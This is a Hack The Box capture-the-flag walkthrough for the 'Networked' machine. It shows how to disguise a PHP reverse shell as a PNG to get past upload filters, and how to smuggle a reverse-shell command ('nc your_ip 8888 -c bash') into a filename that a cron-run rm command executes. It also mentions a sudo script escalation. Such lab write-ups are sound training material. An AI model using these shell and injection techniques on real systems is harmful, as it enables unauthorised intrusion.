Welcome to Hack the Box Walkthrough. In this very first walkthrough post, we are going to cover the retired Virtual Machine on Hack The Box, named Networked. Created by guly, ‘Networked’ box is a CentOS box that resides on IP 10.10.10.146. We will be providing you with a detailed step by step guide on how to hack and exploit Networked using penetration testing tools.
A brief introduction about the Networked Walkthrough
Hack The Box (HTB) is a platform where cybersecurity researchers practice their penetration testing skills. The Networked Box on HTB was released on 24 August this year and is quite easy to hack. So, sit back and read this walkthrough from beginning to end and don’t forget to take notes whenever you feel like, that is, if you are not exploiting the box simultaneously.
We’ll need the following hacking tools to crack Networked:
We have setup Kali Linux and are going to use it for this exploit. If you are also using Kali, then you are in luck, because it has all the above mentioned tools pre-installed in it!
Step One: Scanning the network
1. We’ll start with running the network mapper, nmap, to see if any hosts are available or any ports are open. Since the IP is 10.10.10.146, we shall use the following command to run nmap: nmap -sT -sV -T5 10.10.10.46
2. Sweet! Can you see the two open ports, Port 22 and Port 80, in the image above?
3. C’mon, let’s check which website is running on Port 80, shall we?
Okay, this is slightly disappointing. We also checked out the source code of the page but that didn’t light up our faces either.
4. So, let’s see if we can find something worthwhile in the robots.txt file.
The disappointment doesn’t end as you can see in the image above. It’s time to wield another weapon.
Step Two: Finding hidden files
1. We’ll have to look harder to search for gold. It’s time to say hello to DirBuster, the one and only tool for exposing hidden files and directories in a web server. We can either search the menu for the dirbuster app or summon the beast the right way, i.e. by opening the terminal and typing:dirbuster
2. In the DirBuster window, we type the IP address (10.10.10.146). Now, we need a list of words to start the brute force attack. Conveniently, DirBuster comes with many wordlists, out of which we have chosen the basic one: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
3. While DirBuster is doing its job, we go back to the terminal and fire up nikto to access vulnerabilities in the website. We can see the following flaws discovered in the host.
4. It’s time to check the DirBuster results. Voila! We have found hidden directories and files like photos, uploads, backup etc. (Self high-five)
Step Three: Checking the files
We’ll get started on the files we found on DirBuster. Let’s head to our browser and check what they have in store for us, one by one.
1. The backup folder: Once we open it, we see there is a backup.tar file in the directory. We wonder what’s in there. Let’s download it and find out.
Alright, so this backup file contains all the php files that we had seen in the DirBuster brute force search. This is a good sign, people! We’ll need these later.
2. upload.php: Well, this clearly looks like a place to upload some files.
Let’s get testing. We uploaded a random empty file (abc.txt) to see what happens.
Alright! ‘Invalid image file’ error pops up. Hmmm.. we don’t need to be a Sherlock to figure this one out. Obviously, we’ll need to upload an image file. (Mental note created)
3. Photos.php: Aaahn! Here we can see some images already uploaded by someone. Maybe the image that we are going to put up will also be shown here.
Step Four: Getting ready for the exploit
The plan is to upload a php reverse shell disguised as an image on the upload page. When we will open the photos.php page, our code should be executed.
But first, we need to make sure that the image we upload is not rejected. So, we’ll head on to the files we found to see what filters the website uses to check the validity of an image file.
1. Checking the upload.php: Open the backup.tar zip file. Open upload.php and find out the authentication criteria.
Cool. The website is looking for a .jpg or .png or .gif or .jpeg file. We can do that.
2. Checking the lib.php: Since upload.php requires lib.php as well, we move on to the lib.php code and check that for more criteria.
So, this indicates that the MIME type of the file is also verified. MIME stands for Multipurpose Internet Mail Extension that tells about the contents of files exchanged over the internet. Cool, we’ll keep this in mind too.
3. Getting the shell: It’s time to fetch the reverse shell.
- We downloaded a reverse shell from the internet.
- Renamed it to reverse-shell.php.png (our original file is called reverse-shell.php)
- Switched the IP address in the file to that of our own.
4. Using BurpSuite: We also need to intercept the traffic, which brings us to our next tool in line, BurpSuite. C’mon! Let’s fire it up!
There’s a proxy which BurpSuite is intercepting. We’ll redirect our browser traffic through that proxy.
- Okay, we click GO and upload the file.
- We can see that the packet has been intercepted by BurpSuite.
- We now press Ctrl + R to send the packet to the repeater.
Can you see in the image above that our filename is “rev-shell.php.png” and content type is image/png. Excellent! This means we have successfully disguised our file.
Step Five: Starting the exploit
Now that everything is ready, we are going to execute our plan. (Sinister laugh)
Let’s start with:
1. Uploading the shell: Great! Now we can upload our reverse shell to the server and start deceiving it.
Uh oh! Why is there an “Invalid image file” error?
There’s only one explanation for this- there are some other checks that are being performed on the image file. Well, at least we know that the first eight bytes of a PNG file are 89 50 4E 47 0D 0A 1A 0A, so maybe we can try adding those before the content of the file on BurpSuite, right?
Note: We added 8 spaces before the content, clicked on the hex tab and changed the space values.
We uploaded the shell again and boom! It worked.
2. Executing the code: If everything is right, then as soon as we open photos.php, our reverse shell code shall be executed.
Note: We are going to need an ear to our port in reverse shell (7777) before we do that though. We run this command to start the ncat listener: nc -nlvp 7777
Okay, back to executing the code. Let’s open photos.php and voila! The shell popped open and we are now logged in as apache.
3. Enumerating: Once we do the enumeration, we find some pretty intriguing files in /home/guly. Especially the one called user.txt. (It has the user flag!)
4. Inspecting the files:
- In the file check_attack.php we see that:
– a command nohup /bin/rm -f $path$value > /dev/null 2>&1 & is executed
– the logpath variable is appended by file names in the following directory: /var/www/html/uploads/
- In the file crontab.guly, there is a command that executes the code in the check_attack.php file. This means that when crontab is run, our code is going to be executed with guly privileges.
5. Getting privileges: Here we go! We are creating a file with a malicious name.
- Where we are creating this file? In the upload folder.
- What command are we using? This: cd /var/www/html/uploads/ and this echo > “;nc your_ip 8888 -c bash”
- Now what do we do? We start listening once again.
- Which command do we use now? This: nc -nlvp 8888
We had to wait for a few minutes after this, but it was worth it! Because we got an ear on 8888. And guess what we heard! We got user privileges. (Digital high-five)
Okay, now we can view the user.txt file since we have the user access. Sweet! We are 50% there.
Once more, after some enumeration, we stumbled upon this script:
Well, when we got to reading it, it turned out that it was modifying a network-script
Basically, the thing that is written after a space in the input, is what gets executed. More explanation on this here.
Cool, we shall try this without any delay.
6: Running the script: We run our malicious script using the sudo command that allows us to run a program using privileges of other users. Check out the most commonly used Kali commands.
In sudo, we put our command after space. Here’s how the command looks:
Step Six: Cha ching!
We are now root, my friend!
Woah! This wasn’t that difficult, but we had an exciting time hacking this box. Hope you learned a lot from this Networked Walkthrough. Once you attempt to hack this box, let us know how did it go. Do you want to add something to this Networked Walkthrough? Do you have a question to ask? You can head to our hacking forum to ask anything in the community.
Let us know how you liked this walkthrough in the comments section. Share this with your friends too. And and and, keep an eye out on our blog section as we will be coming up with another walkthrough soon!
Read more. Know more. Grow more.